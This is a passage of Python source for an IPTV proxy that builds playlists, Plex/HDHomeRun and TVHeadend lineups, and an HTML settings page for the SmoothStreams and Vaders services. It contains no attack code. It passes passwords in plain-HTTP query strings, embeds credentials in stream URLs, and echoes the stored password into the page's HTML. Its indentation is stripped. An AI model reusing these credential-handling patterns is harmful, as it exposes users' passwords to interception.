# data = json.loads(requests.urlopen('http://auth.SmoothStreams.tv/hash_api.php?username=%s&password=%s&site=%s' % (user,passwd,site)).read().decode("utf-8"))
if 'hash' not in data or 'valid' not in data:
logger.error("There was no hash auth token returned from auth.SmoothStreams.tv...")
return
else:
token['hash'] = data['hash']
token['expires'] = (datetime.now() + timedelta(minutes=data['valid'])).strftime("%Y-%m-%d %H:%M:%S.%f")
logger.info("Retrieved token %r, expires at %s", token['hash'], token['expires'])
return
def check_token():
if SITE == 'vaders':
return
# load and check/renew token
if not token['hash'] or not token['expires']:
# fetch fresh token
logger.info("There was no token loaded, retrieving your first token...")
get_auth_token(USER, PASS, SITE)
dump_token()
else:
# check / renew token
if datetime.now() > datetime.strptime(token['expires'], "%Y-%m-%d %H:%M:%S.%f"):
# token is expired, renew
logger.info("Token has expired, retrieving a new one...")
get_auth_token(USER, PASS, SITE)
dump_token()
def build_channel_map():
chan_map = {}
logger.debug("Loading channel list")
url = 'https://fast-guide.smoothstreams.tv/altepg/channels.json'
jsonChanList = json.loads(requests.urlopen(url).read().decode("utf-8"))
for item in jsonChanList:
retVal = channelinfo()
# print(item)
oChannel = jsonChanList[item]
retVal.channum = oChannel["channum"]
channel = int(oChannel["channum"])
retVal.channame = oChannel["channame"].replace(format(channel, "02") + " - ", "").strip()
if retVal.channame == 'Empty':
retVal.channame = retVal.channum
retVal.epg = oChannel["xmltvid"]
chan_map[channel] = {}
chan_map[channel] = retVal
logger.debug("Built channel map with %d channels", len(chan_map))
return chan_map
def build_channel_map_sstv():
chan_map = {}
logger.debug("Loading channel list (fallback)")
url = 'https://speed.guide.smoothstreams.tv/feed-new.json'
jsonChanList = json.loads(requests.urlopen(url).read().decode("utf-8"))
jsonEPG = jsonChanList['data']
for item in jsonEPG:
retVal = channelinfo()
# print(item)
oChannel = jsonEPG[item]
retVal.channum = oChannel["number"]
channel = int(oChannel["number"])
retVal.channame = oChannel["name"].replace(format(channel, "02") + " - ", "").strip()
if retVal.channame == 'Empty':
retVal.channame = retVal.channum
retVal.epg = oChannel["number"]
chan_map[channel] = {}
chan_map[channel] = retVal
logger.debug("Built channel map with %d channels", len(chan_map))
return chan_map
def build_playlist(host):
# standard dynamic playlist
global chan_map
# build playlist using the data we have
new_playlist = "#EXTM3U x-tvg-url='%s/epg.xml'\n" % urljoin(host, SERVER_PATH)
for pos in range(1, len(chan_map) + 1):
try:
# build channel url
url = "{0}/playlist.m3u8?ch={1}&strm={2}&qual={3}"
vaders_url = "http://vapi.vaders.tv/play/{0}.{1}?"
if SITE == 'vaders':
tokenDict = {"username": "vsmystreams_" + USER, "password": PASS}
jsonToken = json.dumps(tokenDict)
tokens = base64.b64encode(jsonToken.encode('utf-8'))
strm = 'ts' if STRM == 'mpegts' else 'm3u8'
tokens = urllib.parse.urlencode({"token": str(tokens)[1:]})
channel_url = vaders_url.format(vaders_channels[str(pos)], strm) + tokens
else:
urlformatted = url.format(SERVER_PATH, chan_map[pos].channum, STRM, QUAL)
channel_url = urljoin(host, urlformatted)
# build playlist entry
new_playlist += '#EXTINF:-1 tvg-id="%s" tvg-name="%s" tvg-logo="%s/%s/%s.png" channel-id="%s",%s\n' % (
chan_map[pos].channum, chan_map[pos].channame, host, SERVER_PATH, chan_map[pos].channum,
chan_map[pos].channum,
chan_map[pos].channame)
new_playlist += '%s\n' % channel_url
except:
logger.exception("Channel #%s failed. Channel missing from Fog's channels.json" % pos)
logger.info("Built Dynamic playlist")
return new_playlist
def build_xspf(host, request_file):
# standard dynamic playlist
global chan_map
xspfBodyTemplate = ('<?xml version="1.0" encoding="UTF-8"?>\n' +
'<playlist xmlns="http://xspf.org/ns/0/" xmlns:vlc="http://www.videolan.org/vlc/playlist/ns/0/" version="1">\n' +
'\t<title>Playlist</title>\n' +
'\t<trackList>\n' +
'{0}' +
'\t</trackList>\n' +
'\t<extension application="http://www.videolan.org/vlc/playlist/0">\n' +
'{1}' +
'\t</extension>\n' +
'</playlist>')
xspfTrackTemplate = ('\t\t<track>\n' +
'\t\t\t<location>{5}</location>\n' +
'\t\t\t<title>{3}</title>\n' +
'\t\t\t<creator>{8}</creator>\n' +
'\t\t\t<album>{0}</album>\n' +
'\t\t\t<trackNum>{6}</trackNum>\n' +
'\t\t\t<annotation>{9}</annotation>\n' +
'\t\t\t<extension application="http://www.videolan.org/vlc/playlist/0">\n' +
'\t\t\t\t<vlc:id>{7}</vlc:id>\n' +
'\t\t\t</extension>\n' +
'\t\t</track>\n')
xspfTrack2Template = '\t\t<vlc:item tid="{0}"/>\n'
xspfTracks = ""
xspfTracks2 = ""
# build playlist using the data we have
for pos in range(1, len(chan_map) + 1):
# build channel url
program = getProgram(pos)
url = "{0}/playlist.m3u8?ch={1}"
vaders_url = "http://vapi.vaders.tv/play/{0}.{1}?"
quality = '720p' if QUAL == '1' or pos > QUALLIMIT else '540p' if QUAL == '2' else '360p'
if SITE == 'vaders':
tokenDict = {"username": "vsmystreams_" + USER, "password": PASS}
jsonToken = json.dumps(tokenDict)
tokens = base64.b64encode(jsonToken.encode('utf-8'))
strm = 'ts' if STRM == 'mpegts' else 'm3u8'
tokens = urllib.parse.urlencode({"token": str(tokens)[1:]})
channel_url = vaders_url.format(vaders_channels[str(pos)], strm) + tokens
else:
urlformatted = url.format(SERVER_PATH, chan_map[pos].channum)
template = '{0}://{1}.smoothstreams.tv:{2}/{3}/ch{4}q{5}.stream{6}?wmsAuthSign={7}'
if not 'static' in request_file:
channel_url = urljoin(host, urlformatted)
else:
channel_url = template.format('https' if STRM == 'hls' else 'rtmp', SRVR, '443' if STRM == 'hls' else '3625',
SITE, "{:02}".format(pos), QUAL if pos <= QUALLIMIT else '1',
'/playlist.m3u8' if STRM == 'hls' else '', token['hash'])
# build playlist entry
try:
xspfTracks += xspfTrackTemplate.format(escape(program.album), escape(program.quality),
escape(program.language), escape(program.title),
str(program.channel), channel_url,
str(int(chan_map[pos].channum)),
str(int(chan_map[pos].channum) -1 ),
escape(program.channelname), escape(program.description))
xspfTracks2 += xspfTrack2Template.format(str(int(chan_map[pos].channum) - 1))
except:
logger.exception("Exception while updating playlist: ")
xspf = xspfBodyTemplate.format(xspfTracks, xspfTracks2)
logger.debug("Built xspf playlist")
return xspf
def build_static_playlist():
global chan_map
# build playlist using the data we have
new_playlist = "#EXTM3U x-tvg-url='%s/epg.xml'\n" % urljoin(SERVER_HOST, SERVER_PATH)
for pos in range(1, len(chan_map) + 1):
# build channel url
template = '{0}://{1}.smoothstreams.tv:{2}/{3}/ch{4}q{5}.stream{6}?wmsAuthSign={7}'
urlformatted = template.format('https' if STRM == 'hls' else 'rtmp', SRVR, '443' if STRM == 'hls' else '3625',
SITE, "{:02}".format(pos), QUAL if pos <= QUALLIMIT else '1',
'/playlist.m3u8' if STRM == 'hls' else '', token['hash'])
# build playlist entry
try:
new_playlist += '#EXTINF:-1 tvg-id="%s" tvg-name="%s" tvg-logo="%s/%s/%s.png" channel-id="%s",%s\n' % (
chan_map[pos].channum, chan_map[pos].channame, SERVER_HOST, SERVER_PATH, chan_map[pos].channum,
chan_map[pos].channum,
chan_map[pos].channame)
new_playlist += '%s\n' % urlformatted
except:
logger.exception("Exception while updating static playlist: ")
logger.info("Built static playlist")
return new_playlist
def build_test_playlist(hosts):
# build playlist using the data we have
new_playlist = "#EXTM3U x-tvg-url='%s/epg.xml'\n" % urljoin(SERVER_HOST, SERVER_PATH)
template = '{0}://{1}.smoothstreams.tv:{2}/{3}/ch{4}q{5}.stream{6}?wmsAuthSign={7}'
url = "{0}/sstv/playlist.m3u8?ch=1&strm=hls&qual=1&type={1}"
# build playlist entry
new_playlist += '#EXTINF:-1 tvg-id="1" tvg-name="Static HLS" channel-id="1","Static HLS"\n'
new_playlist += '%s\n' % template.format('https', 'dnaw1', '443', SITE, "01", 1, '/playlist.m3u8', token['hash'])
new_playlist += '#EXTINF:-1 tvg-id="2" tvg-name="Static RTMP" channel-id="2","Static RTMP"\n'
new_playlist += '%s\n' % template.format('rtmp', 'dnaw1', '3625', SITE, "01", 1, '', token['hash'])
count = 3
for host in hosts:
new_playlist += '#EXTINF:-1 tvg-id="%s" tvg-name="Redirect" channel-id="%s","Redirect"\n' % (count, count)
new_playlist += '%s\n' % url.format(host, '1')
count += 1
new_playlist += '#EXTINF:-1 tvg-id="%s" tvg-name="File" channel-id="%s","File"\n' % (count, count)
new_playlist += '%s\n' % url.format(host, '2')
count += 1
new_playlist += '#EXTINF:-1 tvg-id="%s" tvg-name="Variable" channel-id="%s","Variable"\n' % (count, count)
new_playlist += '%s\n' % url.format(host, '3')
count += 1
new_playlist += '#EXTINF:-1 tvg-id="%s" tvg-name="URL" channel-id="%s","URL"\n' % (count, count)
new_playlist += '%s\n' % url.format(host, '4')
count += 1
logger.info("Built static playlist")
return new_playlist
def thread_playlist():
global playlist
while True:
time.sleep(86400)
logger.info("Updating playlist...")
try:
tmp_playlist = build_playlist(SERVER_HOST)
playlist = tmp_playlist
logger.info("Updated playlist!")
except:
logger.exception("Exception while updating playlist: ")
def create_channel_playlist(sanitized_channel, qual, strm, hash):
rtmpTemplate = 'rtmp://{0}.smoothstreams.tv:3625/{1}/ch{2}q{3}.stream?wmsAuthSign={4}'
hlsTemplate = 'https://{0}.smoothstreams.tv:443/{1}/ch{2}q{3}.stream/playlist.m3u8?wmsAuthSign={4}=='
hls_url = hlsTemplate.format(SRVR, SITE, sanitized_channel, qual, hash)
rtmp_url = rtmpTemplate.format(SRVR, SITE, sanitized_channel, qual, hash)
file = requests.urlopen(hls_url, timeout=2).read().decode("utf-8")
if not os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'playlist.m3u8')):
f = open(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'playlist.m3u8'), 'w')
f.close()
if strm == 'hls':
# Used to support HLS HTTPS requests
template = 'https://{0}.smoothstreams.tv:443/{1}/ch{2}q{3}.stream/chunks'
file = file.replace('chunks', template.format(SRVR, SITE, sanitized_channel, qual))
with open(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'playlist.m3u8'), 'r+') as f:
f.write(file)
return file
else:
# not used currently
template = 'http://{0}.smoothstreams.tv:9100/{1}/ch{2}q{3}.stream/chunks'
file = '#EXTM3U\n#EXTINF:' + file[43:110] + "\n" + rtmp_url
# with open(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'playlist.m3u8'), 'r+') as f:
# f.write(file)
return rtmp_url
def create_channel_file(url):
strm = 'hls'
if url.startswith('rtmp'):
strm = 'rtmp'
file = requests.urlopen(url, timeout=2).read().decode("utf-8")
if not os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'playlist.m3u8')):
f = open(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'playlist.m3u8'), 'w')
f.close()
if strm == 'hls':
# Used to support HLS HTTPS requests
# https://dnaw1.smoothstreams.tv:443/viewmmasr/ch69q2.stream/playlist.m3u8?wmsAuthSign=c2VydmVyX3RpbWU9OS82LzIwMTggOToxOTowMCBQTSZoYXNoX3ZhbHVlPTZ4R0QzNlhNMW5OTTgzaXBseXpsY2c9PSZ2YWxpZG1pbnV0ZXM9MjQwJmlkPXZpZXdtbWFzci0yNDI2NjY =
template = find_between(url,'', 'playlist') + "chunks" #'https://{0}.smoothstreams.tv:443/{1}/ch{2}q{3}.stream/chunks'
file = file.replace('chunks', template)
with open(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'playlist.m3u8'), 'r+') as f:
f.write(file)
return file
else:
# not used currently
template = 'http://{0}.smoothstreams.tv:9100/{1}/ch{2}q{3}.stream/chunks'
file = '#EXTM3U\n#EXTINF:' + file[43:110] + "\n" + rtmp_url
# with open(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'playlist.m3u8'), 'r+') as f:
# f.write(file)
return rtmp_url
def checkChannelURL(url):
try:
session = req.Session()
code = session.get(url)
# code = requests.urlopen(url, timeout=10).getcode()
if code.status_code != 200:
logger.debug("Exception on url %s with code %s" % (url, code.status_code))
return False
return True
except timeout:
logger.debug("Timeout on url %s" % url)
return False
except:
logger.debug("Exception on url %s" % url)
return False
def fixURL(strm, ch, qual, hash):
template = '{0}://{1}.smoothstreams.tv:{2}/{3}/ch{4}q{5}.stream{6}?wmsAuthSign={7}'
urlformatted = template.format('https' if strm == 'hls' else 'rtmp', 'SRVR', '443' if strm == 'hls' else '3625', SITE, "{:02}".format(int(ch)), 'QUAL', '/playlist.m3u8' if strm == 'hls' else '', hash)
if checkChannelURL(urlformatted.replace('SRVR',SRVR).replace('QUAL',str(1))):
return urlformatted.replace('SRVR',SRVR).replace('QUAL',str(1))
# Check spare
if checkChannelURL(urlformatted.replace('SRVR',SRVR_SPARE).replace('QUAL',str(qual))):
return urlformatted.replace('SRVR',SRVR_SPARE).replace('QUAL',str(qual))
else:
# Check other qualities
for q in range(1,4):
if checkChannelURL(urlformatted.replace('SRVR', SRVR).replace('QUAL', str(q))):
return urlformatted.replace('SRVR', SRVR).replace('QUAL', str(q))
elif checkChannelURL(urlformatted.replace('SRVR', SRVR_SPARE).replace('QUAL', str(q))):
return urlformatted.replace('SRVR', SRVR_SPARE).replace('QUAL', str(q))
# oh boy we're in trouble now
return findChannelURL(input_url=urlformatted, qual=qual)
############################################################
# m3u8 merger
############################################################
def obtain_m3u8():
formatted_m3u8 = ''
url = EXTM3URL
name = EXTM3UNAME
file = EXTM3UFILE
if url != '':
logger.debug("extra m3u8 url")
inputm3u8 = requests.urlopen(url).read().decode('utf-8')
inputm3u8 = inputm3u8.split("\n")[1:]
elif file != '':
logger.debug("extra m3u8 file")
f = open(file, 'r')
inputm3u8 = f.readlines()
inputm3u8 = inputm3u8[1:]
inputm3u8 = [x.strip("\n") for x in inputm3u8]
else:
logger.debug("extra m3u8 nothing")
return formatted_m3u8
for i in range(len(inputm3u8)):
if inputm3u8[i] != "" or inputm3u8[i] != "\n":
try:
if inputm3u8[i].startswith("#"):
grouper = inputm3u8[i]
grouper = grouper.split(',')
grouper = grouper[0] + ' group-title="%s"' % (name) + "," + grouper[1]
if i != 0:
formatted_m3u8 += "\n"
formatted_m3u8 += grouper
else:
formatted_m3u8 += "\n" + inputm3u8[i]
except:
logger.debug("skipped:", inputm3u8[i])
return formatted_m3u8
def obtain_epg():
if os.path.isfile(os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'combined.xml')):
existing = os.path.join(os.path.dirname(sys.argv[0]), 'cache', 'combined.xml')
cur_utc_hr = datetime.utcnow().replace(microsecond=0, second=0, minute=0).hour
target_utc_hr = (cur_utc_hr // 3) * 3
target_utc_datetime = datetime.utcnow().replace(microsecond=0, second=0, minute=0, hour=target_utc_hr)
logger.debug("utc time is: %s, utc target time is: %s, file time is: %s" % (
datetime.utcnow(), target_utc_datetime, datetime.utcfromtimestamp(os.stat(existing).st_mtime)))
if os.path.isfile(existing) and os.stat(existing).st_mtime > target_utc_datetime.timestamp():
logger.debug("Skipping download of epg")
return
#clear epg file
f = open('./cache/combined.xml','w')
f.write('<?xml version="1.0" encoding="UTF-8"?>'.rstrip('\r\n'))
f.write('''<tv></tv>''')
f.close()
list_of_xmltv = [EXTXMLURL]
for i in list_of_xmltv:
if i != '' and i != 'www.testurl.com/epg.xml':
xmltv_merger(i)
def xmltv_merger(xml_url):
# todo download each xmltv
response = req.get(xml_url)
if response.history:
logger.debug("Request was redirected")
for resp in response.history:
logger.debug("%s %s" % (resp.status_code, resp.url))
logger.debug("Final destination: %s %s" % (response.status_code, response.url))
xml_url = response.url
else:
logger.debug("Request was not redirected")
if xml_url.endswith('.gz'):
requests.urlretrieve(xml_url, './cache/raw.xml.gz')
opened = gzip.open('./cache/raw.xml.gz')
else:
requests.urlretrieve(xml_url, './cache/raw.xml')
opened = open('./cache/raw.xml', encoding="UTF-8")
tree = ET.parse('./cache/epg.xml')
treeroot = tree.getroot()
try:
source = ET.parse(opened)
except:
# Try file as gzip instead
requests.urlretrieve(xml_url, './cache/raw.xml.gz')
opened = gzip.open('./cache/raw.xml.gz')
source = ET.parse(opened)
for channel in source.iter('channel'):
treeroot.append(channel)
for programme in source.iter('programme'):
treeroot.append(programme)
tree.write('./cache/combined.xml')
with open('./cache/combined.xml', 'r+') as f:
content = f.read()
f.seek(0, 0)
f.write('<?xml version="1.0" encoding="UTF-8"?>'.rstrip('\r\n') + content)
return
############################################################
# TVHeadend
############################################################
def build_tvh_playlist():
global chan_map
# build playlist using the data we have
new_playlist = "#EXTM3U\n"
for pos in range(1, len(chan_map) + 1):
try:
# build channel url
template = "{0}/{1}/auto/v{2}"
channel_url = template.format(SERVER_HOST, SERVER_PATH, chan_map[pos].channum)
name = str(pos) + " " + chan_map[pos].channame
# build playlist entry
new_playlist += '#EXTINF:-1 tvg-id="%s" tvh-chnum="%s" tvg-name="%s" tvg-logo="%s/%s/%s.png" channel-id="%s",%s\n' % (
chan_map[pos].channum, chan_map[pos].channum, name, SERVER_HOST, SERVER_PATH, chan_map[pos].channum,
chan_map[pos].channum,
name)
new_playlist += '%s\n' % channel_url
except:
logger.exception("Exception while updating playlist: ")
logger.info("Built TVH playlist")
return new_playlist
def get_tvh_channels():
url = 'HTTP://%s:9981/api/channel/grid?start=0&limit=999999' % TVHURL
try:
r = req.get(url, auth=req.auth.HTTPBasicAuth(TVHUSER, TVHPASS)).text
data = json.loads(r)
return (data['entries'])
except:
print('An error occured')
############################################################
# PLEX Live
############################################################
def discover():
discoverData = {
'FriendlyName': 'SSTVProxy',
'Manufacturer': 'Silicondust',
'ModelNumber': 'HDTC-2US',
'FirmwareName': 'hdhomeruntc_atsc',
'TunerCount': 6,
'FirmwareVersion': '20150826',
'DeviceID': '12345678',
'DeviceAuth': 'test1234',
'BaseURL': SERVER_HOST + "/" + SERVER_PATH,
'LineupURL': '%s/lineup.json' % urljoin(SERVER_HOST, SERVER_PATH)
}
return jsonify(discoverData)
def tvh_discover():
tvhdiscoverData = {
'FriendlyName': 'SSTVProxy',
'Manufacturer': 'Silicondust',
'ModelNumber': 'HDTC-2US',
'FirmwareName': 'hdhomeruntc_atsc',
'TunerCount': 6,
'FirmwareVersion': '20150826',
'DeviceID': '12345678',
'DeviceAuth': 'test1234',
'BaseURL': SERVER_HOST + "/tvh",
'LineupURL': '%s/lineup.json' % (SERVER_HOST + "/tvh")
}
return jsonify(tvhdiscoverData)
def status():
return jsonify({
'ScanInProgress': 0,
'ScanPossible': 1,
'Source': "Cable",
'SourceList': ['Cable']
})
def m3u8_plex(lineup, inputm3u8):
for i in range(len(inputm3u8)):
if inputm3u8[i] != "" or inputm3u8[i] != "\n":
try:
if inputm3u8[i].startswith("#"):
grouper = inputm3u8[i]
grouper = grouper.split(',')
name = grouper[1]
lineup.append({'GuideNumber': str(len(lineup) + 1),
'GuideName': name,
'URL': 'empty'
})
elif inputm3u8[i].startswith("rtmp") or inputm3u8[i].startswith("http"):
template = "{0}/{1}/auto/v{2}?url={3}"
url = template.format(SERVER_HOST, SERVER_PATH, str(len(lineup)), inputm3u8[i])
lineup[-1]['URL'] = url
except:
logger.debug("skipped:", inputm3u8[i])
return lineup
def lineup(chan_map):
lineup = []
for c in range(1, len(chan_map) + 1):
template = "{0}/{1}/auto/v{2}"
url = template.format(SERVER_HOST, SERVER_PATH, chan_map[c].channum)
lineup.append({'GuideNumber': str(chan_map[c].channum),
'GuideName': chan_map[c].channame,
'URL': url
})
formatted_m3u8 = ''
if EXTM3URL != '':
logger.debug("extra m3u8 url")
inputm3u8 = requests.urlopen(EXTM3URL).read().decode('utf-8')
inputm3u8 = inputm3u8.split("\n")[1:]
return jsonify(m3u8_plex(lineup, inputm3u8))
elif EXTM3UFILE != '':
logger.debug("extra m3u8 file")
f = open(EXTM3UFILE, 'r')
inputm3u8 = f.readlines()
inputm3u8 = inputm3u8[1:]
inputm3u8 = [x.strip("\n") for x in inputm3u8]
return jsonify(m3u8_plex(lineup, inputm3u8))
return jsonify(lineup)
def tvh_lineup():
lineup = []
for c in get_tvh_channels():
if c['enabled']:
url = 'http://%s:%s@%s:9981/stream/channel/%s?profile=%s&weight=%s' % (
TVHUSER, TVHPASS, TVHURL, c['uuid'], tvhstreamProfile, int(tvhWeight))
lineup.append({'GuideNumber': str(c['number']),
'GuideName': c['name'],
'URL': url
})
return jsonify(lineup)
def lineup_post():
return ''
def device():
discoverData = {
'FriendlyName': 'SSTVProxy',
'Manufacturer': 'Silicondust',
'ModelNumber': 'HDTC-2US',
'FirmwareName': 'hdhomeruntc_atsc',
'TunerCount': 6,
'FirmwareVersion': '20150826',
'DeviceID': '12345678',
'DeviceAuth': 'test1234',
'BaseURL': SERVER_HOST + "/" + SERVER_PATH,
'LineupURL': '%s/lineup.json' % urljoin(SERVER_HOST, SERVER_PATH)
}
return render_template('device.xml', data=discoverData), {'Content-Type': 'application/xml'}
def tvh_device():
tvhdiscoverData = {
'FriendlyName': 'SSTVProxy',
'Manufacturer': 'Silicondust',
'ModelNumber': 'HDTC-2US',
'FirmwareName': 'hdhomeruntc_atsc',
'TunerCount': 6,
'FirmwareVersion': '20150826',
'DeviceID': '12345678',
'DeviceAuth': 'test1234',
'BaseURL': SERVER_HOST + "/tvh",
'LineupURL': '%s/lineup.json' % (SERVER_HOST + "/tvh")
}
return render_template('device.xml', data=tvhdiscoverData), {'Content-Type': 'application/xml'}
############################################################
# Kodi
############################################################
def build_kodi_playlist():
# kodi playlist contains two copies of channels, first is dynmaic HLS and the second is static rtmp
global chan_map
# build playlist using the data we have
new_playlist = "#EXTM3U x-tvg-url='%s/epg.xml'\n" % urljoin(SERVER_HOST, SERVER_PATH)
for pos in range(1, len(chan_map) + 1):
try:
# build channel url
url = "{0}/playlist.m3u8?ch={1}&strm={2}&qual={3}"
rtmpTemplate = 'rtmp://{0}.smoothstreams.tv:3625/{1}/ch{2}q{3}.stream?wmsAuthSign={4}'
urlformatted = url.format(SERVER_PATH, chan_map[pos].channum, 'hls', QUAL)
channel_url = urljoin(SERVER_HOST, urlformatted)
# build playlist entry
new_playlist += '#EXTINF:-1 tvg-id="%s" tvg-name="%s" tvg-logo="%s/%s/%s.png" channel-id="%s" group-title="Dynamic",%s\n' % (
chan_map[pos].channum, chan_map[pos].channame, SERVER_HOST, SERVER_PATH, chan_map[pos].channum,
chan_map[pos].channum,
chan_map[pos].channame)
new_playlist += '%s\n' % channel_url
new_playlist += '#EXTINF:-1 tvg-id="%s" tvg-name="%s" tvg-logo="%s/%s/%s.png" channel-id="%s" group-title="Static RTMP",%s\n' % (
chan_map[pos].channum, chan_map[pos].channame, SERVER_HOST, SERVER_PATH, chan_map[pos].channum,
chan_map[pos].channum,
chan_map[pos].channame)
new_playlist += '%s\n' % rtmpTemplate.format(SRVR, SITE, "{:02}".format(pos), QUAL if pos <= QUALLIMIT else '1',
token['hash'])
prog = getProgram(pos)
if prog.title != 'none':
new_playlist += '#EXTINF:-1 tvg-id="%s" tvg-name="%s" tvg-logo="%s/%s/%s.png" channel-id="%s" group-title="LIVE",%s\n' % (
chan_map[pos].channum, chan_map[pos].channame, SERVER_HOST, SERVER_PATH, chan_map[pos].channum,
chan_map[pos].channum,
prog.title)
new_playlist += '%s\n' % channel_url
except:
logger.exception("Exception while updating kodi playlist on channel #%s." % pos)
new_playlist += '#EXTINF:-1 tvg-id="static_refresh" tvg-name="Static Refresh" tvg-logo="%s/%s/empty.png" channel-id="0" group-title="Static RTMP",Static Refresh\n' % (
SERVER_HOST, SERVER_PATH)
new_playlist += '%s/%s/refresh.m3u8\n' % (SERVER_HOST, SERVER_PATH)
logger.info("Built Kodi playlist")
# if ADDONPATH and os.path.isdir(ADDONPATH):
# #lazy install, low priority tbh
# tree = ET.parse(os.path.join(ADDONPATH, 'settings.xml'))
# root = tree.getroot()
# for child in root:
# if child.attrib['id'] == 'epgUrl':
# child.attrib['value'] = '%s/%s/epg.xml' % (SERVER_HOST, SERVER_PATH)
# elif child.attrib['id'] == 'm3uUrl':
# child.attrib['value'] = '%s/%s/kodi.m3u8' % (SERVER_HOST, SERVER_PATH)
# elif child.attrib['id'] == 'epgPathType':
# child.attrib['value'] = '1'
# elif child.attrib['id'] == 'm3uPathType':
# child.attrib['value'] = '1'
# tree.write(os.path.join(ADDONPATH, 'settings.xml'))
return new_playlist
def rescan_channels():
credentials = str.encode(KODIUSER + ':' + KODIPASS)
encoded_credentials = base64.b64encode(credentials)
authorization = b'Basic ' + encoded_credentials
apiheaders = {'Content-Type': 'application/json', 'Authorization': authorization}
apidata = {"jsonrpc": "2.0", "method": "Addons.SetAddonEnabled",
"params": {"addonid": "pvr.iptvsimple", "enabled": "toggle"}, "id": 1}
apiurl = 'http://%s:%s/jsonrpc' % (request.environ.get('REMOTE_ADDR'), KODIPORT)
json_data = json.dumps(apidata)
post_data = json_data.encode('utf-8')
apirequest = requests.Request(apiurl, post_data, apiheaders)
# has to happen twice to toggle off then back on
result = requests.urlopen(apirequest)
result = requests.urlopen(apirequest)
logger.info("Forcing Kodi to rescan, result:%s " % result.read())
############################################################
# Html
############################################################
# Change this to change the style of the web page generated
style = """
<style type="text/css">
body { background: white url("https://guide.smoothstreams.tv/assets/images/channels/150.png") no-repeat fixed center center; background-size: 500px 500px; color: black; }
h1 { color: white; background-color: black; padding: 0.5ex }
h2 { color: white; background-color: black; padding: 0.3ex }
.container {display: table; width: 100%;}
.left-half {position: absolute; left: 0px; width: 50%;}
.right-half {position: absolute; right: 0px; width: 50%;}
</style>
"""
def create_menu():
footer = '<p>Donations: PayPal to vorghahn.sstv@gmail.com or BTC - 19qvdk7JYgFruie73jE4VvW7ZJBv8uGtFb</p>'
with open("./cache/settings.html", "w") as html:
html.write("""<html>
<head>
<meta charset="UTF-8">
%s
<title>YAP</title>
</head>
<body>\n""" % (style,))
html.write('<section class="container"><div class="left-half">')
html.write("<h1>YAP Settings</h1>")
template = "<a href='{1}/{2}/{0}.html'>{3}</a>"
html.write("<p>" + template.format("settings",SERVER_HOST, SERVER_PATH,"Options") + " " + template.format("howto",SERVER_HOST, SERVER_PATH,"Instructions") + " " + template.format("channels",SERVER_HOST, SERVER_PATH,"Channels List") + " " + template.format("adv_channels",SERVER_HOST, SERVER_PATH,"Advanced Settings") + "</p>")
html.write('<form action="%s/%s/handle_data" method="post">' % (SERVER_HOST, SERVER_PATH))
channelmap = {}
chanindex = 0
list = ["Username", "Password", "Quality", "Stream", "Server", "Service", "IP", "Port",
"ExternalIP", "ExternalPort"]
html.write('<table width="300" border="2">')
for setting in list:
if setting.lower() == 'service':
html.write('<tr><td>Service:</td><td><select name="Service" size="1">')
for option in providerList:
html.write('<option value="%s"%s>%s</option>' % (
option[0], ' selected' if SITE == option[1] else "", option[0]))
html.write('</select></td></tr>')
elif setting.lower() == 'server':
html.write('<tr><td>Server:</td><td><select name="Server" size="1">')
for option in serverList:
html.write('<option value="%s"%s>%s</option>' % (
option[0], ' selected' if SRVR == option[1] else "", option[0]))
html.write('</select></td></tr>')
elif setting.lower() == 'stream':
html.write('<tr><td>Stream:</td><td><select name="Stream" size="1">')
for option in streamtype:
html.write(
'<option value="%s"%s>%s</option>' % (option, ' selected' if STRM == option else "", option))
html.write('</select></td></tr>')
elif setting.lower() == 'quality':
html.write('<tr><td>Quality:</td><td><select name="Quality" size="1">')
for option in qualityList:
html.write('<option value="%s"%s>%s</option>' % (
option[0], ' selected' if QUAL == option[1] else "", option[0]))
html.write('</select></td></tr>')
elif setting.lower() == 'password':
html.write('<tr><td>%s:</td><td><input name="%s" type="Password" value="%s"></td></tr>' % (
setting, setting, PASS))
else:
val = "Unknown"
if setting == "Username":
val = USER
elif setting == "IP":
val = LISTEN_IP
elif setting == "Port":
val = LISTEN_PORT
elif setting == "ExternalIP":
val = EXTIP
elif setting == "ExternalPort":
val = EXTPORT
html.write(
'<tr><td>%s:</td><td><input name="%s" type="text" value="%s"></td></tr>' % (setting, setting, val))
html.write('</table>')
html.write('<input type="submit" value="Submit">')
html.write('</form>')
html.write("<p>You are running version (%s %s), the latest is %s</p>" % (type, __version__, latest_ver))
html.write("</br><p>Restarts can take a while, it is not immediate.</p>")
html.write('<form action="%s/%s/handle_data" method="post">' % (SERVER_HOST, SERVER_PATH))
html.write('<input type="hidden" name="restart" value="1">')
html.write('<input type="submit" value="Restart">')
html.write('</form>')
html.write('<form action="%s/%s/handle_data" method="post">' % (SERVER_HOST, SERVER_PATH))
html.write('<input type="hidden" name="restart" value="2">')
html.write('<input type="submit" value="Update + Restart">')
html.write('</form>')
html.write('<form action="%s/%s/handle_data" method="post">' % (SERVER_HOST, SERVER_PATH))
html.write('<input type="hidden" name="restart" value="3">')
html.write('<input type="submit" value="Update(Dev Branch) + Restart">')
html.write('</form>')
html.write('<p> </p>')
html.write('<p> </p>')
html.write('<p> </p>')
html.write('<p> </p>')
html.write(footer)
html.write('</div><div class="right-half"><h1>YAP Outputs</h1>')
html.write("<table><tr><td rowspan='2'>Standard Outputs</td><td>m3u8 - %s/playlist.m3u8</td></tr>" % urljoin(
SERVER_HOST, SERVER_PATH))
html.write("<tr><td>EPG - %s/epg.xml</td></tr>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write("<tr><td> </td><td> </td></tr>")
html.write(
"<tr><td>Sports EPG (Alternative)</td><td>%s/sports.xml</td></tr>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write("<tr><td> </td><td> </td></tr>")
html.write(
"<tr><td>Kodi RTMP supported</td><td>m3u8 - %s/kodi.m3u8</td></tr>" % urljoin(SERVER_HOST, SERVER_PATH))
html.write("<tr><td> </td><td> </td></tr>")
html.write("<tr><td rowspan='2'>Plex Live<sup>1</sup></td><td>Tuner - %s</td></tr>" % urljoin(SERVER_HOST,
SERVER_PATH))
